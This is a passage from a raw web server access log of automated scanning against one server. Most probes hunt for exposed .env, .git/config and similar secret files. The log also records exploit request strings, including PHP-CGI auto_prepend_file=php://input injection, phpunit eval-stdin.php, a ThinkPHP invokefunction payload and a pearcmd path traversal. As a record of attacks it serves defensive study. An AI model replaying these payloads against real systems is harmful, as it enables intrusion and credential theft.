AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36" "-" +[15/Jan/2026:11:40:36 +0000] 404 - GET http 92.249.249.197 "/dev/.env~" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Android 6.0.1; Tablet; rv:49.0) Gecko/49.0 Firefox/49.0" "-" +[15/Jan/2026:11:40:36 +0000] 404 - GET http 92.249.249.197 "/lara/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (iPod touch; CPU iPhone OS 11_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 Mobile/15C114 Safari/604.1" "-" +[15/Jan/2026:11:40:37 +0000] 404 - GET http 92.249.249.197 "/dev/.env0" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" "-" +[15/Jan/2026:11:40:37 +0000] 404 - GET http 92.249.249.197 "/node/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6" "-" +[15/Jan/2026:11:40:38 +0000] 404 - GET http 92.249.249.197 "/jest/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6" "-" +[15/Jan/2026:11:40:38 +0000] 404 - GET http 92.249.249.197 "/helm/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko" "-" +[15/Jan/2026:11:40:38 +0000] 404 - GET http 92.249.249.197 "/debug.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36" "-" +[15/Jan/2026:11:40:38 +0000] 404 - GET http 92.249.249.197 "/next/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.999 Safari/533.4" "-" +[15/Jan/2026:11:40:38 +0000] 404 - GET http 92.249.249.197 "/env.local" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0" "-" +[15/Jan/2026:11:40:38 +0000] 404 - GET http 92.249.249.197 "/envs/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Dalvik/1.6.0 (Linux; U; Android 4.4.2; SM-T210 Build/KOT49H)" "-" +[15/Jan/2026:11:40:39 +0000] 404 - GET http 92.249.249.197 "/email.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)" "-" +[15/Jan/2026:11:40:39 +0000] 404 - GET http 92.249.249.197 "/env_2.txt" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 OPR/40.0.2308.90" "-" +[15/Jan/2026:11:40:39 +0000] 404 - GET http 92.249.249.197 "/front.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36" "-" +[15/Jan/2026:11:40:39 +0000] 404 - GET http 92.249.249.197 "/nest/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.5; en-au; GT-S5830 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[15/Jan/2026:11:40:39 +0000] 404 - GET http 92.249.249.197 "/brevo.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG-SM-T337A Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Safari/537.36" "-" +[15/Jan/2026:11:40:39 +0000] 404 - GET http 92.249.249.197 "/api/.env0" [Client 78.153.140.179] [Length 150] [Gzip -] "Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.7.62 Version/11.00" "-" +[15/Jan/2026:11:40:39 +0000] 404 - GET http 92.249.249.197 "/.env_user" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060831 Firefox/1.5.0.5" "-" +[15/Jan/2026:11:40:39 +0000] 404 - GET http 92.249.249.197 "/BACK/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "More Internet Explorer 5.5 user agents strings -->>" "-" +[15/Jan/2026:11:40:39 +0000] 404 - GET http 92.249.249.197 "/.prod-env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0" "-" +[15/Jan/2026:11:40:40 +0000] 404 - GET http 92.249.249.197 "/admin.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Android; Mobile; rv:52.0) Gecko/20100101 Firefox/52.0" "-" +[15/Jan/2026:11:40:40 +0000] 404 - GET http 92.249.249.197 "/app/.env~" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0" "-" +[15/Jan/2026:11:40:40 +0000] 404 - GET http 92.249.249.197 "/User/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)" "-" +[15/Jan/2026:11:40:40 +0000] 404 - GET http 92.249.249.197 "/cloud.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Ubuntu; X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" +[15/Jan/2026:11:40:40 +0000] 404 - GET http 92.249.249.197 "/api/.env~" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5" "-" +[15/Jan/2026:11:40:40 +0000] 404 - GET http 92.249.249.197 "/cicd/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; rv:38.0) Gecko/20100101 Firefox/38.0" "-" +[15/Jan/2026:11:40:40 +0000] 404 - GET http 92.249.249.197 "/Lara/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36" "-" +[15/Jan/2026:11:40:41 +0000] 404 - GET http 92.249.249.197 "/build.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F)" "-" +[15/Jan/2026:11:40:41 +0000] 404 - GET http 92.249.249.197 "/.env-ssrf" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:6.0.2) Gecko/20100101 Firefox/6.0.2" "-" +[15/Jan/2026:11:40:41 +0000] 404 - GET http 92.249.249.197 "/.env-smtp" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9.1" "-" +[15/Jan/2026:11:40:41 +0000] 404 - GET http 92.249.249.197 "/.env_path" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13" "-" +[15/Jan/2026:11:43:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:11:51:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:12:03:29 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[15/Jan/2026:12:03:29 +0000] 404 - GET http 92.249.249.197 "/env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[15/Jan/2026:12:03:30 +0000] 404 - GET http 92.249.249.197 "/public/.env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[15/Jan/2026:12:03:31 +0000] 404 - GET http 92.249.249.197 "/public/env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[15/Jan/2026:12:03:32 +0000] 404 - GET http 92.249.249.197 "/app/.env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[15/Jan/2026:12:06:38 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 216.180.246.233] [Length 1033] [Gzip -] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[15/Jan/2026:12:06:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.233] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:12:07:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 216.180.246.233] [Length 568] [Gzip 1.86] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[15/Jan/2026:12:08:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 64.62.156.182] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" "-" +[15/Jan/2026:12:09:31 +0000] 404 - GET http 92.249.249.197 "/webui/" [Client 64.62.156.182] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50" "-" +[15/Jan/2026:12:10:57 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:12:10:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.233] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:12:11:01 +0000] 404 - GET http 92.249.249.197 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:12:11:40 +0000] 404 - GET http 92.249.249.197 "/geoserver/web/" [Client 64.62.156.182] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" "-" +[15/Jan/2026:12:13:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:12:14:38 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.210.9.131] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:12:18:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:12:19:59 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 185.241.208.170] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36" "-" +[15/Jan/2026:12:37:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:12:41:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:12:41:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:12:41:45 +0000] 404 - GET http 92.249.249.197 "/cgi/conf.bin" [Client 194.50.16.253] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11" "http://92.249.249.197:80/mainFrame.htm" +[15/Jan/2026:13:05:29 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:13:11:09 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 101.36.104.242] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:13:11:09 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 101.36.104.242] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:13:11:09 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:10 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 101.36.104.242] [Length 154] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:10 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:10 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:11 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:11 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:11 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:11 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:12 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:13 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:13 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:13 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:13 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:14 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:14 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:15 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:16 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:16 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:16 +0000] 404 - GET http 92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:16 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:17 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:18 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:18 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:18 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:19 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:19 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:19 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:20 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:20 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:21 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:21 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:21 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:22 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:22 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:23 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:24 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:25 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:25 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:25 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:26 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:26 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:27 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:28 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:11:28 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 101.36.104.242] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:13:31:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:13:32:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:13:40:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:13:41:48 +0000] 400 - GET http 92.249.249.197 "/.env" [Client 188.166.158.67] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[15/Jan/2026:13:41:48 +0000] 400 - GET http 92.249.249.197 "/.git/config" [Client 188.166.158.67] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[15/Jan/2026:13:51:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 35.187.31.145] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[15/Jan/2026:13:53:10 +0000] 400 - GET http localhost "/" [Client 35.216.144.195] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:13:53:10 +0000] 400 - GET http 92.249.249.197 "/" [Client 35.216.144.195] [Length 252] [Gzip -] "abuse.xmco.fr" "-" +[15/Jan/2026:13:53:15 +0000] 400 - GET http 92.249.249.197 "/server-status" [Client 35.216.144.195] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[15/Jan/2026:13:53:16 +0000] 400 - GET http 92.249.249.197 "/config.json" [Client 35.216.144.195] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[15/Jan/2026:13:53:16 +0000] 400 - GET http 92.249.249.197 "/.env" [Client 35.216.144.195] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[15/Jan/2026:13:53:16 +0000] 400 - GET http 92.249.249.197 "/telescope/requests" [Client 35.216.144.195] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[15/Jan/2026:13:53:17 +0000] 400 - GET http 92.249.249.197 "/info.php" [Client 35.216.144.195] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[15/Jan/2026:13:53:17 +0000] 400 - GET http 92.249.249.197 "/.git/config" [Client 35.216.144.195] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" "-" +[15/Jan/2026:13:59:35 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:14:06:33 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:14:09:03 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[15/Jan/2026:14:10:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 103.203.57.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[15/Jan/2026:14:17:52 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 134.199.146.250] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:14:17:52 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 134.199.146.250] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:14:17:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 134.199.146.250] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[15/Jan/2026:14:17:53 +0000] 404 - GET http 